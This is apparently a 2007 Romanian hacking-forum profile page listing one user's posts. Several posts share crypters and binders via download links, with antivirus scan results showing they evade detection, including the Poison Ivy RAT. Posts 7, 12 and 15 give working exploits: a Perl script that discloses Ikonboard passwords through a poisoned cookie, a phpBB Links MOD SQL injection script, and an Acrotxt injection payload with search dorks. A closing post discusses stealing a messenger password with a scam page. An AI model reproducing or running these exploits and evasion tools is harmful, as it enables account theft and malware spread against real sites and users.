Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. AhnLab-V3 2007.9.1.0 2007.09.03 - AntiVir 7.4.1.66 2007.09.02 - Authentium 4.93.8 2007.09.02 - Avast 4.7.1029.0 2007.09.02 - AVG 7.5.0.484 2007.09.02 - CAT-QuickHeal 9.00 2007.09.01 - ClamAV 0.91.2 2007.09.02 - DrWeb 4.33 2007.09.03 - eSafe 7.0.15.0 2007.09.02 - eTrust-Vet 31.1.5100 2007.08.31 - Ewido 4.0 2007.09.02 - FileAdvisor 1 2007.09.03 - Fortinet 3.11.0.0 2007.09.03 - F-Prot 4.3.2.48 2007.09.02 - F-Secure 6.70.13030.0 2007.09.03 - Ikarus T3.1.1.12 2007.09.03 - Kaspersky 4.0.2.24 2007.09.03 - McAfee 5110 2007.08.31 - Microsoft 1.2803 2007.09.03 - NOD32v2 2498 2007.09.03 - Norman 5.80.02 2007.09.02 - Panda 9.0.0.4 2007.09.02 - Prevx1 V2 2007.09.03 - Rising 19.38.62.00 2007.09.02 - Sophos 4.21.0 2007.09.02 - Sunbelt 2.2.907.0 2007.08.31 - TheHacker 6.1.9.175 2007.09.02 - VBA32 3.12.2.3 2007.09.01 - VirusBuster 4.3.26:9 2007.09.02 - Webwasher-Gateway 6.0.1 2007.09.02 Win32.Malware.gen!88 (suspicious) Download: http://rapidshare.com/files/53038424/execrypt.rar
  2. |||MENU||| Primul buton: ADD/OPEN Al doilea: DELETE Al treilea: NEW PROJECT Al patrulea: ABOUT Download: http://rapidshare.com/files/52870514/PowerCrypt.rar
  3. din cate stiu nu se mai formateaza.
  4. Ras

    tequila

    absinth menta la inceput si dupaia te arde grav e tare
  5. Ras

    fAzE XCryptor

    Nu stiu! Nu am folosit acest crypter.
  6. Download: http://rapidshare.com/files/52723487/XCryptor-fAzE.zip
  7. #!/usr/bin/perl -w use strict; use LWP::UserAgent; use HTTP::Cookies; &help unless $#ARGV == 2; &help unless $ARGV[0] =~ m/^(.*)\\.(.*)/gi; &help unless $ARGV[2] =~ m/^\\/(.*)\\//gi; my $host = $ARGV[0]; my $user = $ARGV[1]; my $path = $ARGV[2]; our $lwp = new LWP::UserAgent; $lwp -> agent(\"Ik0nb04d w4r3z by n0stur. ph33r bitchez!\"); our $get = $lwp -> get(\"http://\".$host.\"/cgi-bin\".$path.\"search.cgi?action=display\", \'Cookie\' => \"amembernamecookie=../members/\".$user.\".cgi%00;\") || print \"\\n[-] $!\\n\"; if($get->content() =~ /$user/){ print \"\\n[*] Vulnerable\\n\";} else { &end; } $get->content() =~ /forum=(\\w+)&topic=(\\w+)/; print \"\\n[+] Username: \".$1.\"\\n\"; print \"[+] Password: \".$2.\"\\n\"; print \"Service provided by nostur. njoy, bitchez!\\n\"; sub help { print qq^ Ikonboard all versions remote password disclosure Found by: anonymous... Code by: nostur ->Usage: $0 <host> <user> <path_to_ikonboard_in_cgibin> ^; die(\"\\nNot enough parameters, check the code...\\n\"); } sub end { die(\"\\n[-]Not Vulnerable\\n\"); } # notsec.com
  8. Ras

    help!?

    cumva ai sters programul cu care ai pus iconitza de mp3?
  9. e public de mai mult timp dar nu l-am pus eu aici imi cer scuze pt offtopic.
  10. AhnLab-V3 2007.7.14.0 2007.07.17 no virus found AntiVir 7.4.0.42 2007.07.17 HEUR/Malware Authentium 4.93.8 2007.07.17 no virus found Avast 4.7.997.0 2007.07.17 no virus found AVG 7.5.0.476 2007.07.16 Dropper.Generic.NDH BitDefender 7.2 2007.07.17 no virus found CAT-QuickHeal 9.00 2007.07.17 no virus found ClamAV devel-20070416 2007.07.17 no virus found DrWeb 4.33 2007.07.17 no virus found eSafe 7.0.15.0 2007.07.17 no virus found eTrust-Vet 30.8.3789 2007.07.17 no virus found Ewido 4.0 2007.07.17 no virus found FileAdvisor 1 2007.07.17 no virus found Fortinet 2.91.0.0 2007.07.17 no virus found F-Prot 4.3.2.48 2007.07.17 no virus found Ikarus T3.1.1.8 2007.07.17 no virus found Kaspersky 4.0.2.24 2007.07.17 no virus found McAfee 5076 2007.07.17 MultiDropper-JD Microsoft 1.2704 2007.07.17 no virus found NOD32v2 2403 2007.07.17 no virus found Norman 5.80.02 2007.07.17 no virus found Panda 9.0.0.4 2007.07.17 Suspicious file Sophos 4.19.0 2007.07.16 no virus found Sunbelt 2.2.907.0 2007.07.16 no virus found Symantec 10 2007.07.17 no virus found TheHacker 6.1.7.148 2007.07.16 no virus found VBA32 3.12.2 2007.07.16 no virus found VirusBuster 4.3.23:9 2007.07.17 no virus found Webwasher-Gateway 6.0.1 2007.07.17 Heuristic.Malware Download: http://rapidshare.com/files/52421719/Adrenaline_Binder.rar
  11. Poison Ivy 2.3.0 este scanat mai sus dupa ce a fost cryptat. Download: http://rapidshare.com/files/52420486/Cryptic_v1.5.rar
  12. #!/usr/bin/perl print q{ phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit Bug discovered by Don Dork: allinurl:links.php?t=search or: "Links MOD v1.2.2 by phpBB2.de" SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/* }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*"; print " Exploit in process...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } }
  13. Sp[L]o1T: ai casca de cosmonaut ? aici imi place )
  14. damn ))
  15. #################################################################### Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Bug by: D4m14n [11/07/2007] Page: [url]www.damians-world.dl.am[/url] // [url]www.team-internet.dl.am[/url] Dork: inurl:acrotxt.php wbb #################################################################### SQL-Injection: [url]http://[target]/[/url][path]/acrotxt.php?show=[SQL] Example: /acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*
  16. din cate stiu eu... toate telefoanele care au simbian (sau symbian... nu stiu cum se scrie) pot lua virusi.
  17. Nici la mine nu merge :cry:
  18. flame scrie pe voi... lasa-ti omu in pace... e problema lui daca pune posturi aiurea... poate nu stie mai multe... sau sunteti voi mai destepti.
  19. goog job slick! zicea si vladiii ceva in legatura cu Yahoo Messenger remote BOF. ma bag sa incerc programul tau
  20. Ras

    La Multi Ani!

    La multi ani celor care purtati numele de Alexandru / Alexandra[nu cred ca sunt fete p'aici] Puteti sa imi ziceti si mie la multi ani pt ca ma cheama Alexandru
  21. Lepoon da-mi si mie id-ul tau pe privat... ca sa nu ne certam aici. Daca vrei sa stii Mortal Team este un team mic si nici nu vreau sa fie mare... este site-ul meu si al lui eminem... Am avut echipa aia mica si pe dc++ acum ceva ani buni... cand tu nu cred ca aveai vreo treaba cu calculatorul... Oricum eu tac... da-mi un pm cu id tau si vorbim dupaia... pt ca nu vreau sa iau avertisment aici.
  22. Download: http://rapidshare.com/files/52030595/stealth_20.rar
  23. titlurile si culoarea si a adaugat ceva frumos jos EDIT spiry, cred ca e c99 ala de ieri, nu?
  24. Ras

    Salutare!

    welcome! vezi mesaj pe privat.
  25. Ras

    S.O.s

    ce parola vrei sa furi? [cred ca de mess...] de ce vrei sa furi acea parola? ai incercat si cu pagina scam?
×
×
  • Create New...